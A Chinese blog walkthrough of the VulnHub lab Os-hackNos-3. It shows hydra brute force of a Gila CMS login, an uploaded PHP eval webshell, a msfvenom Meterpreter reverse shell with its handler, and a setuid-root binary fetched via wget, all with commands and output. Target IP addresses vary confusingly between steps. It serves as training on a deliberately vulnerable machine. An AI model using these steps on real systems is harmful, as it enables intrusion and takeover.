靶机Hacknos-3

kali ip：192.168.1.131

target ip：192.168.1.23

靶机下载：hackNos: Os-hackNos-3 ~ VulnHub

靶机目标：普通用户的user.txt和root用户的root.txt

步骤一：使用nmap进行网络扫描，发现目标192.168.1.23为入侵目标靶机...

nmap -sn 192.168.1.0/24
nmap -sS -A -T5 192.168.1.202 -O

登录可以发现这样的页面

步骤二：使用目录扫描工具两种都可以，随便用一种就可以

2.使用gobuster工具对该网站进行目录扫描发现/scripts/路径并访问...并无实际利用点...

这个我没有成功

./dirsearch.py -u http://192.168.1.23/gobuster dir -u http://192.168.1.202/ -w /home/flao/桌面/wordlist.list -x .php,.zip,.txt,.html

第一种扫描结果

第二种扫描结果这个是参考的，自己没有试成功

步骤三：访问这几个文件无果后回到站点主页面，发现 You need extra WebSec在其站点后面添加路径/websec/发现是一套CMS站点并扫描器后台登录页面/websec/admin

在title处发现Gila CMS字样...并搜索发现为一套开源的CMS...

步骤四：使用搜索引擎检索下Gila CMS的可利用漏洞找到以下两个漏洞....文件包含漏洞需要登录后台，所以接下来的思路就是尝试弱口令爆破....

Gila CMS < 1.11.1 - Local File Inclusion - Multiple webapps Exploit #文件包含漏洞
Gila CMS 1.9.1 - Cross-Site Scripting - PHP webapps Exploit #XSS跨站脚本攻击

步骤五：使用cewl工具对其网站信息进行收集并制作成字典...

cewl http://192.168.1.202/websec/ > passwd.txt#密码破解
hydra -l contact@hacknos.com -P cewl.txt  192.168.1.23 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email" -V

步骤六：和上一步作用类似这里使用网站首页的邮箱作为是用户名，passwd.txt作为密码开始使用Burpsuite对后台进行延迟暴力破解....得出：contact@hacknos.com:SecurityX

账号密码登录后的样子

步骤七：进入后台后尝试GetShell，在Content>>Media处可以上传图片，Content>>File Manager处可以编辑PHP文件....在Content>>File Manager处进入tmp目录编辑.htaccess文件，将里面的内容全部删除点击Save并进入tmp/media_thumb/目录下上传一句话文件，访问并使用蚁剑进行链接...

先把.htaccess文件内容删除后再进行上传一句话文件

<?php @eval($_POST['z4pts']);?>
http://192.168.1.98/websec/tmp/media_thumb/test.php

访问后的样子

步骤八：使用蚁剑进行链接并上传由msf生成的Shell文件...在kali中启动msfconsole并进去到监听模式然后...打开浏览器访问webshell.php进行shell反弹....

#MSF生成PHP木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.193 LPORT=1234 R > webshell.php
chmod 777 webshell.php
#使用蚁剑文件管理将生成的php上传上去
#kali中启动msfconsole接受Shell反弹
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.193    #这里的ip是自己kali的ip
set LPORT 1234              #监听的端口号

这里反弹shell是你打开监听模式后再打开浏览器访问上传的shell会自动监听

步骤九：在meterpreter下输入shell命令进入目标shell环境并执行以下命令进入bash环境....

python -c 'import pty; pty.spawn("/bin/bash")'

步骤十：编译以下程序源码并上传到靶机目录下，给于777权限并执行获取高权限...并拿去Flag...

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>int main()
{setuid(0);setgid(0);system("/bin/bash");return 0;
}

#kali中的编译操作
root@kali:~# gcc exp.c -o exp
luci11.c: In function ‘main’:
luci11.c:9:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]9 |   system("/bin/bash");|   ^~~~~~
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8080 ...

#目标靶机操作
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ wget http://192.168.1.193:8080/exp -O exp
<ia_thumb$ wget http://192.168.1.193:8080/exp -O exp
--2022-02-22 12:48:35--  http://192.168.1.193:8080/exp
Connecting to 192.168.1.193:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16224 (16K) [application/octet-stream]
Saving to: 'exp'exp                 100%[===================>]  15.84K  --.-KB/s    in 0s      2022-02-22 12:48:35 (428 MB/s) - 'exp' saved [16224/16224]www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ ls
ls
assetsgila-logo.png  exp  flao.php  shell.php
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ whoami
whoami
www-data
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ chmod 777 exp
chmod 777 exp
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp
<ml/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp
Process 3771 detected
root@hacknos:/var/www/html/websec/tmp/media_thumb# whoami
whoami
root
root@hacknos:/var/www/html/websec/tmp/media_thumb# cd /root
cd /root
root@hacknos:/root# ls
ls
root.txt  snap
root@hacknos:/root# cat root.txt

###第二种提权方式：

切换到home目录下发现存在账户blackdevil用户
在/var/local/database文件中发现存在加密值

进行解密的到blackdevil用户密码进行su切换
sudo -l查询sudo权限为ALL 直接sudo su执行得到root用户权限..

解密网站：https://www.spammimic.com/spreadsheet.php

www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cd /home
cd /home
www-data@hacknos:/home$ ls
ls
blackdevil
www-data@hacknos:/home$ cd /var/local
cd /var/local/
www-data@hacknos:/var/local$ ls
ls
database
www-data@hacknos:/var/local$ cat database
cat database
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet
www-data@hacknos:/var/local$ su blackdevil
su blackdevil
Password: Security@x@blackdevil@hacknos:/var/local$ sudo -l
sudo -l
[sudo] password for blackdevil: Security@x@Matching Defaults entries for blackdevil on hacknos:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser blackdevil may run the following commands on hacknos:(ALL : ALL) ALL
blackdevil@hacknos:/var/local$ sudo su
sudo su
root@hacknos:/var/local# whoami
whoami
root
root@hacknos:/var/local#

###参考资料：

『VulnHub系列』hackNos: Os-hackNos-3-Walkthrough - 灰信网（软件开发博客聚合）
VulnHub-hackNos: Os-hackNos-3-靶机通关复现 | CN-SEC 中文网

vulnhub靶机渗透[Os-hackNos-3] | lUc1f3r11's blog

靶机Hacknos-3相关推荐

Vulnhub靶机：HA_ NARAK
目录介绍主机发现主机信息探测网站探测目录爆破提示文件利用 hydra爆破web密码 webdav漏洞手工-失败 MSF davtest cadaver 反弹shell 敏感信息收集-fl ...
vulnhub靶机练习-Os-hackNos-1
今天带来的靶机是 vulnhub Os-hackNos-1 先看一下简介: 难度容易到中 flag 两个一个是普通用户的user.txt 另外一个是root用户的user.txt 0.靶机简介: D ...
靶机Hacknos-2.1
靶机地址 https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/# 目标为普通用户的user.txt和root用户的root.txt 第一步现 ...
Vulnhub靶机：GEARS OF WAR_ EP#1
目录介绍信息收集主机发现主机信息探测访问网站测试 samba 安全 smbmap 访问默认共享 enum4linux 获取系统用户 smbclient获取文件查看文件 SSH爆破登录S ...
vulnhub靶机 Os-ByteSec
vulnhub靶机 Os-ByteSec 靶机地址hackNos: Os-Bytesec ~ VulnHub 目标为普通用户的user.txt和root用户的root.txt 靶机配置靶机网卡配置 ...
HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
HA: InfinityStones靶机渗透测试
文章目录靶机信息一.信息收集 1.主机发现 2.端口扫描 3.目录扫描二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...
HA: Forensics靶机渗透测试
文章目录靶机说明: 一.信息收集 1.主机发现 2.端口扫描二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...
HA: Dhanush靶机渗透测试
文章目录一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权靶机 ...

靶机Hacknos-3

靶机Hacknos-3相关推荐

最新文章

热门文章